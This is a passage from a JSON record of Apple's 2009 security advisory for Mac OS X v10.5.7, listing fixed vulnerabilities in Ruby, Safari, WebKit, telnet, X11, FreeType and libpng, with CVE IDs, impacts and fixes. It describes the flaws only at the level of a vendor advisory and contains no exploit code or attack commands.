v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Ruby 1.8.6\r\n\r\n Description: Multiple vulnerabilities exist in Ruby 1.8.6. This update addresses the issues by updating Ruby to version 1.8.6-p287. Further information is available via the Ruby web site at http://www.ruby-lang.org/en/security/\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2009-0161\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Ruby programs may accept revoked certificates\r\n\r\n Description: An incomplete error check exists in Ruby's use of the OpenSSL library. The OpenSSL::OCSP Ruby module may interpret an invalid response as an OCSP validation of the certificate. This update addresses the issue through improved error checking while verifying OCSP responses.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2009-0162\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to arbitrary code execution\r\n\r\n Description: Multiple input validation issues exist in Safari's handling of "feed:" URLs. Accessing a maliciously crafted "feed:" URL may lead to the execution of arbitrary JavaScript. This update addresses the issues by performing additional validation of "feed:" URLs. These issues do not affect systems prior to Mac OS X v10.5. Credit to Billy Rios of Microsoft Vulnerability Research (MSVR), and Alfredo Melloni for reporting these issues.\r\n\r\n *\r\n\r\n Spotlight\r\n\r\n CVE-ID: CVE-2009-0944\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the Mac OS X Microsoft Office Spotlight Importer. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of Microsoft Office files.\r\n\r\n *\r\n\r\n system_cmds\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: The "login" command always runs the default shell with normal priority\r\n\r\n Description: The "login" command starts an interactive shell after a local user is authenticated. The priority level for the interactive shell is reset to the system default, which can cause the shell to run with an unexpectedly high priority. This update addresses the issue by respecting the priority setting of the calling process if the caller is the superuser or the user who was successfully logged in.\r\n\r\n *\r\n\r\n telnet\r\n\r\n CVE-ID: CVE-2009-0158\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in telnet command. Connecting to a TELNET server with a very long canonical name in its DNS address record may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n WebKit\r\n\r\n CVE-ID: CVE-2009-0945\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in WebKit's handling of SVGList objects. Visiting a maliciously crafted website may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. For Mac OS X v10.4.11 and Mac OS X Server v10.4.11, updating to Safari 3.2.3 will address this issue. Credit to Nils working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2006-0747, CVE-2007-2754\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.1.4\r\n\r\n Description: Multiple vulnerabilities exist in FreeType v2.1.4, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. This update addresses the issues by updating FreeType to version 2.3.8. Further information is available via the FreeType site at http://www.freetype.org/ The issues are already addressed in systems running Mac OS X v10.5.6.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-2383\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Displaying maliciously crafted data within an xterm terminal may lead to arbitrary code execution\r\n\r\n Description: The xterm program supports a command sequence known as DECRQSS that can be used to return information about the current terminal. The information returned is sent as terminal input similar to keyboard input by a user. Within an xterm terminal, displaying maliciously crafted data containing such sequences may result in command injection. This update addresses the issue by performing additional validation of the output data. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2008-1382, CVE-2009-0040\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in libpng version 1.2.26\r\n\r\n Description: Multiple vulnerabilities exist in libpng version 1.2.26, the most serious of which may lead to arbitrary code execution. This update addresses the issues by updating libpng to version 1.2.35. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html These issues do not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n X11\r\n\r\n CVE-ID: CVE-2009-0946\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in FreeType v2.3.8\r\n\r\n Description: Multiple integer overflows exist in FreeType v2.3.8, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking. Credit to Tavis Ormandy of the Google Security Team for reporting these issues.\r\n", "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21825", "title": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}